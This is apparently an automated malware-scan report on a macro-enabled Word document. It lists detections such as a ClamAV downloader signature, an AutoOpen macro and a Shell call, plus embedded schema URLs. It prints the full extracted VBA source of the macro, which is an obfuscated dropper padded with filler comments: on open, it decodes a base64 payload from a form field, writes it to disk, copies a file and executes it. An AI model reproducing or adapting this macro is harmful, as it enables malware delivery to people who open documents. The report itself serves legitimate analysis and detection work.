MALICIOUS
190
Risk Score
Heuristics 6
-
ClamAV: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Dim a3alM As New Shell32.Shell -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
With CreateObject("Microsoft.XMLDOM").createElement("b64") -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7387 bytes |
SHA-256: 700887aa47b04f766cab927e3b17845e3dfe48d724372c47d63b342ced8dab1e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "frm"
Attribute VB_Base = "0{8E3A0CFD-551E-4D8A-9B41-B0B9CDBBA681}{108C453B-01EB-4265-BBE9-B5D17BFE1D14}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "ajcFt3"
Sub AutoOpen()
' Oppress potter
' Calculators sioux tank cities
' Viking desire
' Unlettered prevalence tools hopefully
' Puns
' Ensnare pentecost gg fears revel graph atmospheric
Call aiGml
End Sub
Sub aiGml()
aVI3oy
End Sub
Function a5mtiD(aGdwI)
aXEBOz = ""
For aSvsa = Len(aGdwI) To 1 Step -1
aXEBOz = aXEBOz & "" & Mid(aGdwI, aSvsa, 1)
Next aSvsa
a5mtiD = aXEBOz
End Function
Function a8sImz(b64)
With CreateObject("Microsoft.XMLDOM").createElement("b64")
.DataType = "bin.base64"
.text = b64
b = .nodeTypedValue
End With
a8sImz = StrConv(b, vbUnicode)
End Function
Attribute VB_Name = "ahzuXE"
Sub ax57JP(as46g, auHMZa)
' Greenwich montgomery chevrolet deter outermost
' Routing vacation adware talisman exorbitant
Set arunF = CreateObject("Scripting.FileSystemObject")
Call arunF.CopyFile(as46g, auHMZa, 1)
' Courier acre childlike pleasant pt
' Addition hysteria bentley
' Predicate talking portrait canal
End Sub
Sub aZYQ8D(ay6rsq, a5eUsW)
' Technique
' Reaching
' Photography ontario debauchery seaport ebony cc
' Skating hosted horseshoe
' Microscopic expiration incredulity
' Dictator
' Integral recrimination tips acute fantastic measuring
' Seraph startle floor carp
' Tile greenhouse nicer
' Physiological young
' Global allie novels yolk
' Randy stalking ati strapping
' Incorporate applications pharmaceuticals pomerania speaker
' Belongings
' Purchasing shut ditty ratify
' Prayers develops
' Irascible mpegs
' Prisoner census wrestling
' Arid painstaking
' Cry bevy atlas
' Tartarus andes dutch
' Graft absinthe overworked
' Grinder pugnacious condone sacramento tutelary
' Df leaks
' Save sausage scenic henderson
' Aluminium
Open ay6rsq For Output As #1
Print #1, a5eUsW
' Stefan insecure determination
' Colic onslaught yeast thumbnails satchel
' Mpg
' Plaint indoor rev simply
Close #1
End Sub
Attribute VB_Name = "aGEteI"
Function a2POb(aJZq5)
' Accurate different verdant
' Avowal characteristics jo cogent dearborn
' Surrounding confounds
' Zones avignon cosy exalt
' Arts peel boolean householder bk madcap
' Endowment initiation gracefulness ka reynard
' Ao scholastic
End Function
Function a7zJH(aGIcgy)
' Forbes assembly cards
' Deciduous
' Quasi president explicit
' Embedded dan
' Supposed luminary including
' Burmese expansys
' Invective
' Dui informal subsidiaries
' Plaid
' Metabolism archives
' Pare disrepute initiated decorative infected
' Subsidiary script queenly
' Confronting colossus bernard
anUHD = Split(a5mtiD(frm.paths.text), "|")
Select Case aGIcgy
Case Is = 0
a7zJH = anUHD(0)
Case Is = 1
a7zJH = anUHD(1)
Case Is = 2
a7zJH = anUHD(2)
Case Is = 3
a7zJH = anUHD(3)
End Select
' Raised institutes mountain imagination
' Brahma rutledge
' Stanford buffalo
' Celerity supporter
' Deduction shrub twitter wines value conciliatory nutriment
' Unconditional
' Encumbrance stopping
' Hurt feat nectar accomplishing
' Sift advertise lush miss unblemished slot
' Ie crane rio
' Recede nicer monologue
' Tilt volleyball lair modified
' Ver spot secretariat warily gale
' Iteration fm divorced obviously
' Propagation venues wampum
' Animates dans
' Television abusive
' Mahogany chrome
' Processes numbers pronunciation
' Subheading shared
' Coalition barricade
' Waiver stimulate mutilation
' Clay blake purr
' Unfeeling goal fetus composers
End Function
Function ar9sv(aaEse, agSeJ)
' Overdo protocol
' Browsing orchestral romantic
' Postmark specialized shepherd reservoir
' Seasonal
' Fluffy pet grass
' Articulated
' Twang pay grip aberration lb cleaners understand manufacturer
' Schoolfellow readings applied
' Radiation eating albums
' Investigators belize
' Herbal dyou
' Nominative idea jewelry routing vented
' Endorse
' Compress activity
' Affluent cistern combines theoretic
' Rf plausibly zest
End Function
Sub aVI3oy()
atboU = a7zJH(0)
aa3MIF = a7zJH(1)
aH2ON = a7zJH(2)
arKS7 = a7zJH(3)
' Lift nw palliate poplar
' Toothed amphitheatre
' Dudgeon hug celtic pokemon buyers
' Logos commitment bra continually deficit
' Vigilant confront typewritten
' Defeat television reminder
' Approved author pal beads islam
' Daytime neal whosoever intoxicate drew
' Obesity introduction
' Confronting
' Mysticism stumble
' Stephanie underwear seam
' Crook ohg. glasgow effeminate
' Enjoyed most downloads unicameral pegasus
' Boss adduce
' Canto
' Ran mop significantly indivisible
' Paths probation november rove
' Details mines athletics
' Seventy-eight photography betrayal thirty-eight
' Vibrating unfavorable occur turkey
' Meet co-operate benign olive sententious
' Shack pregnancy thered josh bachelor
' Wanna frantically survival
amXaC = a5mtiD(a8sImz(frm.pay.text))
' Insinuation quotes realistic ingredient
' Creditor
aZYQ8D atboU, amXaC
' Smtp considerable shades inflated
' Jay nylon
' Shingle transmit magnetism highs bay
' Ghana decrease abridge rectangular enigmatic personnel associate
' Substantial contribution physiology unravel
' Technical cap vishnu
' Shell yokohama shipping
' Customer magenta ribbon
' Camera hame mouthful holes
' Beehive essex condensation
ax57JP aH2ON, aa3MIF
' Saffron spouting mesopotamia apt
' Relinquish persistent
' Canvas europe scalp coincide cupola
' Sim taxes navigator alternate
' Sloth stile lounge
' Nymph
' Fig baritone elderly
' Analyze puny
' Defile ia
' Vp baffle sd
' Retinue bellows originate vega
' Sustenance somewhat daytime failed das
' Circumcision civilian
' Debates giraffe challenge mid
' Numeral au
' Scenes
' Cologne sync trespassing te
' Star bangladesh lesser
' Knights partly ninety-nine transcript
a0xVW = Chr(34)
aXLZQ = Trim(arKS7 & "t : " & a0xVW & atboU & a0xVW)
' Collie rectangular hollow width unto tri
' Harper examined sensuous indonesian
' Satellite indigo stroke petition mic perfunctory
' Fiji broken-down discovery nationwide
' Mil returning j clinical
' Hu clipped incidental knox
' Harder predicted knitting grad
Dim a3alM As New Shell32.Shell
Call a3alM.ShellExecute(aa3MIF, aXLZQ, " ", SW_SHOWNORMAL)
' Backgrounds pointers
' Tested thinking affably
' Lisbon bavarian
' Perplex estimation lucerne
' Sesame malaysia lagoon
' Giver clip routines absolve sensed gibberish
' Conduit foremen striking mtv plaint
' Citation lloyd bronchitis fuzzy rebuilt
' Greg planets correlated
' Transparency inkjet trunk pillage filter myrrh
' Coherent satisfy
' Evidence dp
' Phrases loop
' Lunge sheath best
' Desperate linda
' Float speed immobility
' Area
' Crossbow characteristically sluts icq avoiding
' Vistula city secrete
' Proposition cohesion
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 39424 bytes |
SHA-256: 960345ae0600ce34adeba47cb4144a40a73ae2e4582a522b60005d9f0912e7be |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.